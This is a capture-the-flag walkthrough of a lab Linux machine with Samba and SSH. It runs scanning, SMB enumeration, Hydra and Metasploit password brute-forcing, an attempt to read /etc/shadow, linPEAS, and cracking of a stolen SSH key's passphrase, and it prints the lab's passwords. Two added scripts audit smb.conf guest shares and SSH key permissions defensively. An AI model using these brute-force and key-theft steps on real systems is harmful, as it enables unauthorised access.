Deploy the machine and connect to our network
This one is self-explanatory.
Find the services exposed by the machine
nmap -sV 10.80.154.156
Looks like we have SMB, HTTP, and SSH
What is the name of the hidden directory on the web server (enter name without /)?
gobuster dir -u 10.80.154.156 -w ~/Repos/Pentesting/SecLists/Discovery/Web-Content/common.txt -x php,html,js,txt,asp,aspx,jsp
# or
nikto -h 10.80.154.156
Answer: development
User brute-forcing to find the username & password
What is the username?
I manually connected to the SMB share as a guest and found staff.txt with two names. I got lucky because there was an Anonymous share I could connect to as a guest; a better approach would be to enumerate the shares with SMBMap first.
nmap -sC -p 139,445 -sV 10.80.154.156
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-16 17:46 +0000
Nmap scan report for 10.80.154.156
Host is up (0.013s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 4
445/tcp open netbios-ssn Samba smbd 4
Host script results:
|_nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-12-16T17:46:25
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.93 seconds
smbmap -H 10.80.154.156
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[+] IP: 10.80.154.156:445 Name: 10.80.154.156 Status: NULL Session
Disk Permissions Comment
---- ----------- -------
Anonymous READ ONLY
IPC$ NO ACCESS IPC Service (Samba Server 4.15.13-Ubuntu)
[*] Closed 1 connections
smbclient \\\\10.80.154.156\\Anonymous
smb: \> ls
. D 0 Thu Apr 19 17:31:20 2018
.. D 0 Thu Apr 19 17:13:06 2018
staff.txt N 173 Thu Apr 19 17:29:55 2018
14282840 blocks of size 1024. 6427448 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (3.0 KiloBytes/sec) (average 3.0 KiloBytes/sec)
cat staff.txt
"
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, Jan!)
-Kay
"
Answer: jan
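The null session above worked because the Samba server exposes a share with guest access. The following script is an added example for this write-up (not code from the original post, from Samba or from SMBMap): it parses an smb.conf and flags the settings that make a share reachable without credentials, so an administrator can catch an Anonymous-style share before a scanner does. The smb.conf text inside it is constructed for the demo and is not the target's real configuration.

```python
"""Audit an smb.conf for shares that a null/guest session can reach.

Added example for this write-up; the sample configuration is constructed.
"""
import re

# Constructed smb.conf: one read-only guest share (like "Anonymous" above),
# one writable guest share, one share that needs credentials.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = Samba Server
   map to guest = Bad User

[Anonymous]
   path = /home/anonymous
   guest ok = yes
   read only = yes
   ; comment lines start with ; or #

[staff]
   path = /srv/staff
   public = yes
   writable = yes

[homes]
   browseable = no
   read only = no
"""

TRUTHY = {"yes", "true", "1"}


def normalise_key(key):
    # Samba matches parameter names case-insensitively and ignores whitespace.
    return re.sub(r"\s+", "", key.strip().lower())


def parse_smb_conf(text):
    """Return {section_name: {normalised_key: lowercased_value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            current = header.group(1).strip()
            sections[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][normalise_key(key)] = value.strip().lower()
    return sections


def share_allows_guest(opts):
    # "public" is a documented synonym for "guest ok".
    return opts.get("guestok", opts.get("public", "no")) in TRUTHY


def share_is_writable(opts):
    # "read only" (default yes) and "writable"/"writeable" are inverse synonyms;
    # "read only" is checked first when both are present.
    if "readonly" in opts:
        return opts["readonly"] not in TRUTHY
    for key in ("writable", "writeable"):
        if key in opts:
            return opts[key] in TRUTHY
    return False


def audit(text):
    """Return (section, finding) pairs for every guest-reachable share."""
    sections = parse_smb_conf(text)
    glob = next((o for n, o in sections.items() if n.lower() == "global"), {})
    findings = []
    if glob.get("maptoguest", "never") != "never":
        findings.append(("global", "map to guest = %s turns failed logins into guest sessions"
                         % glob["maptoguest"]))
    for name, opts in sections.items():
        if name.lower() == "global" or not share_allows_guest(opts):
            continue
        access = "read/write" if share_is_writable(opts) else "read only"
        findings.append((name, "guest-accessible (%s)" % access))
    return findings


if __name__ == "__main__":
    for section, finding in audit(SAMPLE_SMB_CONF):
        print("[%s] %s" % (section, finding))
```

Run it against a real /etc/samba/smb.conf by reading the file into audit(); the fix for a finding is `guest ok = no` on the share (or `map to guest = never` globally) unless anonymous read access is genuinely intended.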
What is the password?
msfdb init
msfconsole
>use auxiliary/scanner/smb/smb_login
>set DETECT_ANY_AUTH false
>set RHOSTS 10.80.145.254
>set SMBUser jan
>set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
>run
Metasploit seems to be giving a false positive on the password for jan; let's try Hydra.
hydra -l jan -P /usr/share/wordlists/metasploit/unix_passwords.txt 10.80.145.254 smb2
Looks like I'm still getting false positives; maybe I should be attacking SSH instead.
hydra -l jan -P /usr/share/wordlists/metasploit/unix_passwords.txt 10.80.145.254 ssh
[22][ssh] host: 10.80.145.254 login: jan password: armando
Got it!
Answer: armando
What service do you use to access the server (answer in abbreviation in all caps)?
Answer: SSH
Enumerate the machine to find any vectors for privilege escalation
What is the name of the other user you found (all lower case)?
I have found a few ways of getting the other username
enum4linux -a 10.80.145.254
...
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
S-1-22-1-1002 Unix User\ubuntu (Local User)
...
ssh jan@10.80.145.254
jan@ip-10-80-145-254:~$ cat /etc/shadow
cat: /etc/shadow: Permission denied
jan@ip-10-80-145-254:~$ sudo !!
sudo cat /etc/shadow
jan is not in the sudoers file. This incident will be reported.
jan@ip-10-80-145-254:~$ grep "/bin/bash" /etc/passwd
root:x:0:0:root:/root:/bin/bash
kay:x:1000:1000:Kay,,,:/home/kay:/bin/bash
jan:x:1001:1001::/home/jan:/bin/bash
ubuntu:x:1002:1002:Ubuntu:/home/ubuntu:/bin/bash
ls /home/
Answer: kay
If you have found another user, what can you do with this information?
What is the final password you obtain?
Brute-forcing SSH for the user kay did not work, and nothing readable was found in /home/kay.
Let's try linPEAS.
cd ~/bin
wget https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh
scp ./linpeas.sh jan@10.80.145.254:/dev/shm
ssh jan@10.80.145.254
cd /dev/shm
chmod +x ./linpeas.sh
./linpeas.sh
Looks like we can read /home/kay/.ssh/id_rsa. I'll copy that and try to SSH in using the private key.
chmod 600 kay_id_rsa
ssh -i kay_id_rsa kay@10.80.145.254
Seems that there is a passphrase on the key; let's see if we can brute-force it.
ssh2john kay_id_rsa > kay_id_rsa-4john.txt
john kay_id_rsa-4john.txt --wordlist=/usr/share/wordlists/rockyou.txt
...
beeswax (kay_id_rsa)
...
Great, now let's SSH back in as kay using the passphrase.
ssh -i kay_id_rsa kay@10.80.145.254
Enter passphrase for key 'kay_id_rsa': beeswax
ls
cat pass.bak
Now, if we run sudo with any command using that password, it works.
Answer: heresareallystrongpasswordthatfollowsthepasswordpolicy$$
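Two things made the final step possible: kay's private key was readable by another user, and its passphrase was weak enough for a wordlist. The script below is an added example for this write-up (not code from the original post or from linPEAS) that audits a directory tree for private keys with loose permissions and reports whether each one is passphrase-protected, reading the cipher name out of the OpenSSH key container (or the legacy PEM `Proc-Type` header). The home-directory layout and the key blobs are constructed for the demo; the blobs carry only the header fields the parser reads, so ssh itself would not accept them.

```python
"""Report readable SSH private keys and whether they are passphrase-protected.

Added example for this write-up; the demo home directory is constructed.
"""
import base64
import os
import stat
import struct
import tempfile

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def openssh_cipher(body_b64):
    """Cipher name from an openssh-key-v1 blob; 'none' means no passphrase."""
    raw = base64.b64decode(body_b64)
    if not raw.startswith(OPENSSH_MAGIC):
        return None
    off = len(OPENSSH_MAGIC)
    (length,) = struct.unpack(">I", raw[off:off + 4])  # length-prefixed string
    return raw[off + 4:off + 4 + length].decode()


def key_is_encrypted(data):
    """Handle both the current OpenSSH container and legacy PEM keys."""
    text = data.decode(errors="replace")
    if "BEGIN OPENSSH PRIVATE KEY" in text:
        body = "".join(l for l in text.splitlines() if not l.startswith("-----"))
        return openssh_cipher(body) != "none"
    return "Proc-Type: 4,ENCRYPTED" in text  # legacy PEM marker for encrypted keys


def is_private_key(path):
    try:
        with open(path, "rb") as fh:
            head = fh.read(64)
    except OSError:
        return False
    return head.startswith(b"-----BEGIN ") and b"PRIVATE KEY" in head


def audit_keys(root):
    """Walk root and describe every private key found: mode, exposure, encryption."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not is_private_key(path):
                continue
            mode = stat.S_IMODE(os.stat(path).st_mode)
            with open(path, "rb") as fh:
                data = fh.read()
            findings.append({
                "path": os.path.relpath(path, root),
                "mode": oct(mode),
                "readable_by_others": bool(mode & 0o044),  # group or other read bit
                "encrypted": key_is_encrypted(data),
            })
    return findings


def fake_openssh_key(cipher):
    """Constructed key blob with a valid header and empty key material."""
    def s(b):
        return struct.pack(">I", len(b)) + b
    kdf = b"bcrypt" if cipher != "none" else b"none"
    raw = (OPENSSH_MAGIC + s(cipher.encode()) + s(kdf) + s(b"")
           + struct.pack(">I", 1) + s(b"") + s(b""))
    body = base64.b64encode(raw).decode()
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n"
            "-----END OPENSSH PRIVATE KEY-----\n" % body).encode()


def build_demo_home():
    """Constructed /home: kay's key is 0644 and encrypted, jan's is 0600 and not."""
    root = tempfile.mkdtemp(prefix="demo_home_")
    layout = {
        "kay/.ssh/id_rsa": (fake_openssh_key("aes256-ctr"), 0o644),
        "jan/.ssh/id_ed25519": (fake_openssh_key("none"), 0o600),
        "kay/notes.txt": (b"not a key\n", 0o644),
    }
    for rel, (content, mode) in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    for finding in audit_keys(build_demo_home()):
        print(finding)
```

Pointed at a real /home, a "readable_by_others": True entry is the finding linPEAS surfaced above, and the remediation is `chmod 600` plus a key rotation, since the key must be assumed copied; "encrypted": False on top of that means no passphrase stood between the reader and the account at all.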